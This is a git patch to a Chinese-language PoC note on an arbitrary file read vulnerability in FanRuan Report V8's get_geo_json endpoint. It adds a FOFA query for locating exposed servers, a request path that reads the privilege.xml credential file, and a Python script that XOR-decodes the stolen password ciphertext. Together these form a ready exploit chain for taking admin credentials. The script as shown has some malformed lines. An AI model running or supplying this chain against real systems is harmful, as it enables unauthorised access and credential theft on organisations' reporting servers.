From a58423bdb4ff980a7d34ac07caf18e653cb753df Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 14 Dec 2023 12:54:37 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E5=B8=86=E8=BD=AF=E6=8A=A5=E8=A1=A8?=
 =?UTF-8?q?=20V8=20get=5Fgeo=5Fjson=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 帆软报表 V8 get_geo_json 任意文件读取漏洞.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/帆软报表 V8 get_geo_json 任意文件读取漏洞.md b/帆软报表 V8 get_geo_json 任意文件读取漏洞.md
index 9c9a159..91a359b 100644
--- a/帆软报表 V8 get_geo_json 任意文件读取漏洞.md	
+++ b/帆软报表 V8 get_geo_json 任意文件读取漏洞.md	
@@ -1,9 +1,19 @@
 ## 帆软报表 V8 get_geo_json 任意文件读取漏洞
 
+## fofa
+```
+body="isSupportForgetPwd"
+
+```
+
+## poc
 ```
 WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
+```
+
 获得账号密码后进行解密，解密脚本如下
-解密脚本
+## 解密脚本
+```python
 cipher = 'XXXXXXXXXXX' #密文
 PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
 Password = "" cipher = cipher[3:]
@@ -12,5 +22,4 @@ c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
 c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
 Password = Password + chr(c2)
 print (Password)
-
 ```